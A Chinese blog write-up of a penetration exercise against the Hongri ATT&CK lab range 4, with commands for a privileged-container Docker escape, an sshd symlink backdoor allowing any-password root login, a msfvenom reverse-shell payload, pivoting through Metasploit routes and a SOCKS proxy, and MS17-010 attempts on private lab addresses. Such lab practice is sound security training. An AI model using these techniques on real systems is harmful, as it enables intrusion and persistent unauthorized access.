红日靶场4
1 | 说实话也好久没有打靶场了,这次也来继续打红日靶场过下瘾,因为前段时间一直在研究免杀。 |
环境搭建
红日ATT&CK系列靶场(四)搭建_哔哩哔哩_bilibili
1 | ubuntu:ubuntu域成员机器 |
1 | 大家好红日安全红队靶场(四)已经出来,本次靶场渗透反序列化漏洞、命令执行漏洞、Tomcat漏洞、MS系列漏洞、端口转发漏洞、以及域渗透等多种组合漏洞。 |
web的docker打开
1 | cd /home/ubuntu/Desktop/vulhub/struts2/s2-045 |
win7不知道烦什么毛病啊
外网打点
getshell
192.168.157.128
这个是目标地址,首先我们扫一扫端口,根据官方的提示应该是有三种方式拿下shell的,strusts
漏洞利用
,phpmyadmin
getshel
l,tomcat
漏洞利用
分别对应了strusts
漏洞利用,phpmyadmin
getshel
l,tomcat
漏洞利用。
第一个structs我直接用的工具啊(后面我会专门写文章从与原理分析
Tomcat任意文件上传漏洞
phpmyadmin我就不用说了吧,我写的有博客 phpmyadmin后台拿shell的4种方式 | 十三の博客 (wanheiqiyihu.top)
docker逃逸
1 | 首先查看是否是在docker环境中 |
确定当前为docker环境,进行docker逃逸。
这是我第一次接触docker逃逸,这里就想跟着大佬做,后面出文章总结一下docker逃逸的原理和方法(挖坑)。
利用特权模式逃逸
如果是通过特权模式启动容器,就可以获得大量设备文件的访问权限,因为管理员执行docker run —privileged
时,Docker容器将被允许访问主机上的所有设备,并可以执行mount命令进行挂载。
创建一个文件夹,将宿主机根目录挂载至容器目录下
1 | fdisk -l #linux中通过fdisk -l 查看机器所挂硬盘个数及分区情况 |
进入这个创建的文件夹,发现可以修改其中的内容,在相同版本的ubuntu创建一个root权限的用户,然后复制进去。当然也要改shadow
(111条消息) 记录ubuntu建立新用户并赋予root权限_早睡早起不偷懒!的博客-CSDN博客_ubuntu创建用户并赋予权限
然后就ssh连接
1 | ssh wanheiqiyihu@192.168.157.128 |
这里我们把ubuntu也弄成root权限,这样才能设置root的密码
提权
权限维持
用ssh软连接后面进行权限维持
1 | ln -sf /usr/sbin/sshd /usr/local/su;/usr/local/su -oport=12345 |
要连接的时候
1 | ssh root@192.168.100.145 -p 12345 |
任意密码登录
内网渗透
生成一个木马文件,然后上线msf
1 | msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.100.129 LPORT=9995 -f elf > shell.elf |
开始监听
1 | use exploit/multi/handler |
有点慢啊,弄得我都怀疑是命令哪里出错了,结果是之前环境错了,连不了外网,我把另一个网卡改成nat模式了。
这样就可以连接了
1 | run get_local_subnets |
配置转发
run autoroute -s 192.168.183.0/24
socks代理
1 | use auxiliary/server/socks_proxy |
1 | vi /etc/proxychains.conf |
修改好
1 | proxychains msfconsole |
漏洞扫描
在ubuntu上弄个fscan
1 | ./fscan_amd64 -h 192.168.183.0/24 |
两个ms17-010
1 | search ms17_010 |
额,给打蓝屏了还是没利用成功?(不愧是永恒之蓝?
这环境也太不稳了。
暂时这样吧,后面单独复现永恒之蓝,电脑要卡死了。
后面就是永恒之蓝,然后MS14-068抓密码